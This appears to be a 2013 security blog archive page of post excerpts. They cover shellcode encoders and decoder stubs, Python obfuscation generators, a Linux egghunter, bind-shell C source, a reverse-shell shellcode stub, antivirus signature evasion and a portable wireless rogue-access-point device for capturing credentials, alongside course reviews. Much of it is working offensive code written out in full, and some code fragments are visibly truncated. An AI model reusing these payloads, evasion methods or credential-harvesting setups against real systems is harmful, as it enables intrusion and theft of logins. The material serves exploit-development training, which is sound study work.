BASH One liner – Disassemble shellcode

April 30th, 2013

Here’s a BASH one liner that I just discovered that will allow you to disassemble shellcode on the command line:

echo -n $'\x41\x41\x41\x41' | ndisasm -u -

00000000  41                inc ecx
00000001  41                inc ecx
00000002  41                inc ecx
00000003  41                inc ecx


Wireless Exploit Device Code

April 26th, 2013

The wireless network service exploiter that was written for the Automatic Wireless Hacking Station is as follows. This is of course to be used for research and testing purposes only, and not for anything illegal.

Update: You can download the code here.

This tool runs fake HTTP, POP3, and IMAP servers as well as their SSL counterparts. It is part of the wireless MITM device for usage in situations without internet connectivity. It dynamically handles SSL certificate generation, logs GPS co-ordinates if they’re available in /run/gpsdata and logs any credentials to a sqlite3 database. It will respond to the iDevice and Blackberry internet connectivity test and it can also optionally deliver a message to any POP3 victims.

Fully Automatic Wireless Hacking Station

April 26th, 2013

This article describes a working all-in-one standalone mobile wireless attack station that can perform MITM type attacks on clients automatically and without any internet access or other external connectivity or influence.

In laypersons terms; this portable battery powered device can automatically entice wireless devices to connect to it, be that iPhones/iPads, Androids and other phones or laptops and PCs. Most devices will connect to it automatically without the user even realizing. The device will provide a fake network running fake email and web servers and using some network trickery, will capture the hostname, username and password of any attempted connection and log it, along with the GPS co-ordinates of where the details were captured. This device could be used to hijack corporate and personal email logins, facebook logins, and so on.

HTTPS ActiveSync

Messing around with airbase-ng, part of the aircrack-ng suite over the last few months and researching wireless client vulnerabilities has led to an interesting proof of concept project. There are several weaknesses within the current wireless technologies in widespread use. First however, an explanation of the project. The project description was to launch a wireless man in the middle (MITM) attack, without having another end to connect the victim to. We need to create a MITM attack without having any internet access. Such an attack could theoretically be used on the tube, in locked down buildings, on the move, and so on, and without the use of a mobile data card. Built on top of a modified raspberry pwn release, although any Linux distribution would have been suitable, I have set my wireless device with a power output of 30dBm and started the following automated process:

Firstly, an airbase instance on my rtl8187 card as follows;

/usr/local/sbin/airbase-ng -c 3 wlan0 –essids “/root/pen/code/scripts/essids” -P -C 60 -I 60 -vv|grep –line-buffered  “directed probe request”|tee /run/probes

This starts an access point on channel 3, beaconing the SSIDs contained within /root/pen/code/scripts/essids as well as any probe requests that the access point may receive from clients looking to connect to an access point. Now, in a little more detail, regular ‘non-hidden’ access points will broadcast ‘beacons’ which are pieces of data that specify the SSID (wireless network name) as well as the supported encryption types and so on. These beacons are usually sent every 100msec. Wireless clients will send probe packets, containing the SSIDs of all wireless networks that they have stored, and asking if any of them are here.

Raspberry Pi

Raspberry Pi

The -P switch to airbase-ng will have airbase respond to all probes saying “yes, that’s me” at which point assuming the encryption or lack thereof matches the stored profile, the client will attempt to associate. Mid way through building this test however, Apple released IOS 6, and one of the changes seems that the iPhone will now only send out broadcast probes rather than directed probes, rendering the -P feature useless against them. The broadcast probe is where the device sends out a “is anyone there?” probe, and waits to see which access points reply. Most iPhones however have connected at some point to a wireless hotspot, and so the SSIDs I chose for the essids file are “Boingo Hotspot”, “BTOpenzone” and “BTWiFi” in the UK. I believe that “attwifi” is a popular one in the US.

Read the rest of this entry »

Anti Virus Evasion – Part 1

April 18th, 2013

Most if not all anti virus application work based on file signatures on disk. They have a large database of specific byte patterns, and they look for one or more byte patterns within a file. Some of the more advanced anti virus applications have additional features such as heuristics detection – i.e. looking for suspicious markers in what the application actually does. We’re trying to target basic anti virus signature matching. Currently our ‘nc.exe’ binary is being detected as malicious by AVG, and we want to know which part exactly is triggering the alert.

The utility listed below will allow us to split our binary up into increasing sizes. Using the command:

# ./ nc/nc.exe 100
Creating 593 files. ^C now if this is not what you want...

We will create versions of nc.exe of increasing sizes. As we have specified ‘100’ bytes, nc.exe.0 will be 100 bytes in size, nc.exe.1 will be 200 bytes in size, all the way to the original size (59392) which will require 593 files to be created.

Once this is done, we can ship this directory over to our AV machine and run a scan. Everything from nc.exe.0 to nc.exe.162 is clean, whilst nc.exe.163 to nc.exe.593 is detected and quarantined. We now know that something in the last 100 bytes of nc.exe.163 is triggering the pattern match.

ls -al nc.exe.163
-rw-r--r-- 1 root root 16400 2013-04-18 16:50 nc.exe.163

nc.exe.163 is 16400 bytes in size, and therefore, something between 16300 and 16400 is the trigger. Now lets split that down further, this time specifying the offset of 16300 and increments of 10 bytes:

Read the rest of this entry »

Offensive Security PWB Course and OSCP Certification Review

April 11th, 2013

I had read several positive reviews on Offensive Security’s PWB course, and decided to enrol a few months back. Having completed the course and passed the exam, I can confidently say that this is the best course that I’ve taken to date, and I’ll now expand on that a little.

In terms of pricing, I think that for the course quality and depth, the cost is exceptionally low. The amount of work that has gone into the creation of the course and the extensive live training environment (labs) is obvious from the outset. The training itself is delivered through documentation and an audio/video series. All of the exercises are fully repeatable and practicable in the lab environment. The number of target machines within the lab environment and the complexity and detail of the setup is one of the biggest assets of the course. I’m not sure that a more comprehensive setup exists anywhere else. The range of different operating systems and vulnerable software is vast.



I came from a background of extensive Linux system admin, LAMP web application development and LAMP pen testing. I’d done a few infrastructure pen tests, but nothing major, and this was my main reason for taking the course. My Linux experience was probably the biggest help throughout the course and while it is suggested that students have, “a solid understanding of TCP/IP, networking and reasonable Linux skills” on the offsec site, I cannot stress the importance of this enough. If I was unfamiliar with the Linux command line before starting this course, I would really have struggled and potentially bombed out half way through. I learned little major on those fronts of my existing experience however, I learned and practiced an absolute ton in areas that I hadn’t touched too often such as the exploitation of vulnerable windows services, advanced usage of metasploit, constructing and debugging win32 buffer overflows, generating different exploit payloads, and more topics than I can even list.
Read the rest of this entry »

Python Cascading XOR Polymorphic Shellcode Generator

April 11th, 2013

I’ve been working on a simple python utility to encode and wrap existing shellcode. The shellcode is XOR’d with a random seed byte each time, and then the shellcode is XOR’d with the previous byte. The stub itself is vaguely polymorphic. The stub itself is very small although on each run, it will reorder instructions where possible, use different registers, and add some random nop sequences. The encoder itself supports shellcode with or without null bytes and also supports a list of ‘bad characters’ that are not allowed to appear in the finished result wherever possible. That part isn’t fool proof, and certain characters such as ‘\xeb’ are unavoidable. This could be improved a lot however. I also know the Python code isn’t great, but it is functional. As you’ll see from looking through the code, I never got round to learning about Python data types and so there’s a lot of hackery and kludgery. In any case, the purpose was just to develop a basic functional PoC from scratch.

If the entered shellcode contains nulls, we’ll use a slightly different version of the decoder stub. If we DO have nulls, our basic stub is:

jmp short getpc
pop edi
inc edi
mov bl, [edi]
xor [edi-1], bl
cmp byte[edi+1], 0xXX
jnz decoder
jmp short shellcode
call start_decoder
shellcode: db 0xf0,0x19,0x0c,0x0c,0x0c,0x0c,0x55,0x64,0xa4,0x95,0x4e,0x7f,0xad,0x1d,0x19,0xaa,0xab,0x19,0x14,0xd9,0x59,0xe9,0xe8,0x5b,0x5a,0x97,0x17,0xff,0x19,0xe6,0x19,0xe6,0xae,0xcb,0xa7,0xcb,0xa4,0x84,0xd3,0xbc,0xce,0xa2,0xc6,0xe7,0xed,0xXX,

There will be various transforms made to this code, however the main point to note is that we ‘cmp’ the byte with our random stop bit (0xXX) and you’ll see that tagged on to the end of the shellcode also. If we have no nulls, then \x00 is going to be our definer for the last character, and so we can shorten the shellcode slightly:

global _start
section prog write exec
jmp short getpc
pop ebp
mov dl, [ebp+1]
inc ebp
xor [ebp-1], dl
jne decoder
jmp short shellcode
call start_decoder
shellcode: db 0x64,0x55,0x8e,0x79,0x9a,0x2a,0x4c,0x1f,0xe1,0x22,0x71,0x1b,0x19,0x90,0x71,0xbc,0x3c,0xb5,0x72,0x18,0x7e,0x26,0x7d,0x23,0x45,0x2d,0x20,0xd0,0xb6,0xe5,0x6c,0x8d,0xe7,0xf7,0xa6,0xf1,0x78,0x99,0x54,0xd4,0xbe,0xd8,0x80,0x81,0x5a,0x30,0x31,0x66,0xef,0x0e,0xc3,0x43,0x29,0x4f,0x17,0x54,0x65,0xb7,0xe5,0xb7,0xe0,0x69,0x88,0x45,0xc5,0x56,0x67,0xae,0x1f,0x1d,0xad,0x92,0x5f,0xdf,0x96,0xef,0x16,0x27,0xe7,0xb7,0xdf,0xf0,0xdf,0xac,0xc4,0xac,0x83,0xe1,0x88,0xe6,0x6f,0x8c,0xdc,0x55,0xb7,0xe4,0x6d,0x8c,0x3c,0x37,0xfa,0x7a,0x7a,

In this case, we have the stop bit twice – 0x7a,0x7a which will xor to 0x00 allowing our ‘jne decoder’ to evaluate to false and continue into the shellcode.

The nop generator function is commented out however this can be expanded as needed to pad out the shellcode.

Here’s the full encoder:

Read the rest of this entry »

SLAE Shellcode Dissection

April 11th, 2013

As part of the SecurityTube SLAE course, I’m going to dissect 3 shellcodes from and then also create variants of 3 shellcodes from Here they are: This is a very well optimized shellcode. The shellcode is designed to run the ‘ifconfig eth0 down’ command which will take down the eth0 network interface under Linux. My analysis is as follows:

push   $0xb		;Push 0xb (11) on to the stack
pop    %eax		;Pop the stack into eax. Now eax eq 0xb (11)
cltd			;Extend the sign of eax(0) -> edx. i.e. zero edx
push   %edx		;Push 0x00000000 to the stack
push   $0x6e776f64	;Push 'down' in reverse
mov    %esp,%esi	;Move a pointer to 'down' in to esi
push   %edx		;Push 0x00000000 to the stack
push   $0x30687465	;Push 'eth0' in reverse
mov    %esp,%ecx	;Move a pointer to 'eth0' in to ecx
push   %edx		;Push 0x00000000 to the stack
push   $0x6769666e	;nfig
push   $0x6f636669	;ifco
push   $0x2f2f6e69	;in//
push   $0x62732f2f	;//sb
mov    %esp,%ebx	;Push pointer to //sbin//ifconfig
push   %edx		;Push 0x00000000
push   %esi		;Push pointer to 'down'
push   %ecx		;Push pointer to 'eth0'
push   %ebx		;Push pointer to '//sbin//ifconfig'
mov    %esp,%ecx	;Move the stack pointer to ecx for call below
int    $0x80		;Call system call (0xb) - execve

Read the rest of this entry »

Review of the Firebrand CISSP Course and Exam

April 8th, 2013

I took the CISSP bootcamp and certification at Firebrand training last month, and thought I’d write a quick review of the experience.

I had previously taken the shorter PRINCE2 3 day project management course and certification with Firebrand and was very happy with the entire package. This was a 7 day bootcamp with an intensive 6 hour exam on the final day. These weren’t lazy days – we were regularly starting at or before 8am each morning, and working up until 7pm. After dinner there was usually more revision and material to be studied in private. Those that did the best on the course seemed to be the ones that immersed themselves in the environment rather than constantly checking and responding to emails, taking calls and so on. Overall, I have nothing but good things to say about the Firebrand experience. The courses aren’t cheap but you get what you pay for and the quality is fantastic. The bedrooms are by no means luxury however they don’t need to be, and they are more than comfortable for the short time spent in them. Three good meals are served each day in the restaurant, and there is plenty of choice.
Read the rest of this entry »

Converting binary to shellcode

April 8th, 2013

Here is my ‘’. This is a short bash script that will convert binary to shellcode on the Linux console using objdump:

code=$(objdump -d $1|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|tr -s ' '|tr '\t' '!'|cut -d \! -f 2|sed s/^/\ /g|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g')
len=$(echo $code|grep -o \\\\|wc -l)
echo $code
echo "len: " $len

This was originally taken from the SecurityTube SLAE video series however it was improved to face a shortcoming where it didn’t work in all cases if a certain set of instructions was too long. This new version should work in all cases

Here’s a far better version from commandlinefu:

for i in $(objdump -d binary -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo

Insertion and additive XOR encoder shellcode

April 8th, 2013

Another shellcode generator I’ve just created is an additive XOR encoder on top of the previous insertion encoder. Each byte in the shellcode is XOR’d with the previous. Bad character filtering is also supported:


#; Title Insertion and Additive XOR encoder v0.1
#; Author npn <npn at iodigitalsec dot com>
#; License
#; Legitimate use and research only
#; This program is distributed in the hope that it will be useful,
#; but WITHOUT ANY WARRANTY; without even the implied warranty of

import random

shellcode = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e"

badchars = (["\x0a", "\x0d"])
stopbyte = "\xaa"


#print "Starting Set length: " + repr(len(allowedxors))

allowedxors = (["\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x09","\x0a","\x0b","\x0c",
if stopbyte in allowedxors:

for b in badchars:
	if b in allowedxors:

#step1 insert random junk in every other byte
b = bytearray()
for x in bytearray(shellcode):
shellcode = b

#step2 cascading additive xor with known start byte
myallowedxors = list(allowedxors)
for ax in myallowedxors:
	b = bytearray()
	lastbyte = ord(ax)
	badchar = 0
	for x in bytearray(shellcode):
		thisbyte = x^lastbyte
		if chr(thisbyte) == stopbyte or chr(thisbyte) in badchars:
			badchar = 1
		lastbyte = thisbyte
 	if badchar == 1:
if badchar == 1:
	print "No bytes left(3)"

print "Succeeded on %d of %d" % (loopctr, len(allowedxors))
shellcode = b

#step3 put it together

encoded = ""
encoded2 = ""

for x in bytearray(shellcode):
	encoded += '\\x%02x' % x
	encoded2 += '0x%02x,' % x

print encoded
print encoded2
print 'Len: %d' % (len(encoded)/4)

Read the rest of this entry »

Linux Insertion Obfuscated Shellcode

April 8th, 2013

Here is my next shellcode, along with a generator. This generator inserts a random bit between each legitimate shellcode character, and then the decoder stub unpacks it before running it:

; Title Linux Insertion Obfuscated Shellcode v0.1
; Author npn <npn at iodigitalsec dot com>
; License
; Legitimate use and research only
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of


shellcode = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
stopchar = "\xff";
encoded = ""
encoded2 = ""

import random

for x in bytearray(shellcode):
        encoded += '\\x'
        encoded += '%02x' % x
        encoded += '\\x%02x' % random.randint(1,254)

        encoded2 += '0x'
        encoded2 += '%02x,' % x
        encoded2 += '0x%02x,' % random.randint(1,254)

encoded += '\\x'
encoded += '%02x' % ord(stopchar)
encoded2 += '0x'
encoded2 += '%02x' % ord(stopchar)

print encoded
print encoded2
print 'Len: %d' % len(bytearray(shellcode))

Read the rest of this entry »

Certified Ethical Hacker (CEH) Course and Exam Review

April 7th, 2013

I took the CEH some time ago now, but I’ve only just got round to writing a review of the course and experience. I’ll start by saying that a lot of the reviews I had read before taking the course hadn’t been great, however the certification is recognised in industry, and it had caught my attention a couple of times after I’d seen it listed on requirement sheets for pen test contracts. I’d been doing a lot of web application pen testing, but hardly any infrastructure testing at the time, and this was something I was trying to get more heavily involved in.

CEH Logo

CEH Logo

The gist of the negative reviews that I’d read had been that there was far too much focus on how many names of obscure ‘hacking tools’ amongst other irrelevant knowledge you can memorize and regurgitate on demand in multiple choice format. I set this aside, and decided I was going to take the certification anyway, simply because it was recognised and might be required in pen tests that I might want to go after in future. I remember looking at a few batches of sample questions online and deciding that I was just going to self-study for this – a lot of sample questions centered on basic TCP vs UDP, port numbering and networking type material and after checking out a couple of sources of sample questions, I estimated that I already had about 70% of the knowledge needed to pass the exam. I was surprised to see that if I chose to just buy the exam voucher, I would be penalized in terms of cost and additional fees, and would have to go through additional verification in order to get the certification as I had not been through “approved training”. I therefore decided to take the official EC-Council online training material which I studied over a period of 2 weeks before taking the exam.
Read the rest of this entry »

Linux Egghunter Shellcode

April 7th, 2013

I created my first egghunter today, and with a little optimization it’s only 38 bytes in size. It would be possible to make a smaller egghunter that did not check for access to the page such as this one which is only 29 bytes! It would run slower however.

The bytes to modify are highlighted in bold (\xf3 \x3d \xf0 \x0d). The shellcode itself is:
“\xff\xe7”. The shellcode searches through memory for the tag twice over before jumping execution to the location immediately after. The shellcode will skip pages that give error (cmp al, 0xf2; jz next_page) rather than blindly continuing.

The assembly code for this shellcode is:

; Title Linux Egghunter Shellcode v0.1
; Author npn <npn at iodigitalsec dot com>
; License
; Legitimate use and research only
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
global _start

section .text

xor ecx, ecx
mul ecx

or dx, 0xfff;

push byte 0x21  ;access()
pop eax
inc edx
;ecx is 0 already
lea ebx, [edx+4]
int 0x80

cmp al, 0xf2    ;check for error
jz next_page    ;can't read the page

mov edi, edx
mov eax, 0x0df03df3
jnz next_byte   ;keep trying
scasd           ;do we have the string twice?
jnz next_byte   ;keep trying

jmp edi         ;found

Read the rest of this entry »

Linux Reverse Shell TCP Shellcode

April 7th, 2013

Now to create a reasonably well optimized linux Reverse TCP shellcode (66 bytes):

“\x7f\x00\x00\x01” <- IP address
“\x0d\xf0” <- Port 3568

Read the rest of this entry »

Linux Shell Bind TCP Shellcode

April 7th, 2013

As part of the SecurityTube SLAE course, I’m going to create a series of shellcodes and document the process. The first task is to create a simple shell bind tcp that spawns a shell on connect, with a port that is easily configurable. Firstly, I wrote out in C what I was hoping to achieve:

#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>

int main(void)
        int clientfd, sockfd;
        int dstport = 4444;
        int o = 1;
        struct sockaddr_in mysockaddr;

        sockfd = socket(AF_INET, SOCK_STREAM, 0);
        //setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &o, sizeof(o)); //a luxury we don't have space for

        mysockaddr.sin_family = AF_INET; //2
        mysockaddr.sin_port = htons(dstport);
        mysockaddr.sin_addr.s_addr = INADDR_ANY; //0

        bind(sockfd, (struct sockaddr *) &mysockaddr, sizeof(mysockaddr));

        listen(sockfd, 0);

        clientfd = accept(sockfd, NULL, NULL);

        dup2(clientfd, 0);
        dup2(clientfd, 1);
        dup2(clientfd, 2);

        execve("/bin/sh", NULL, NULL);
        return 0;

Read the rest of this entry »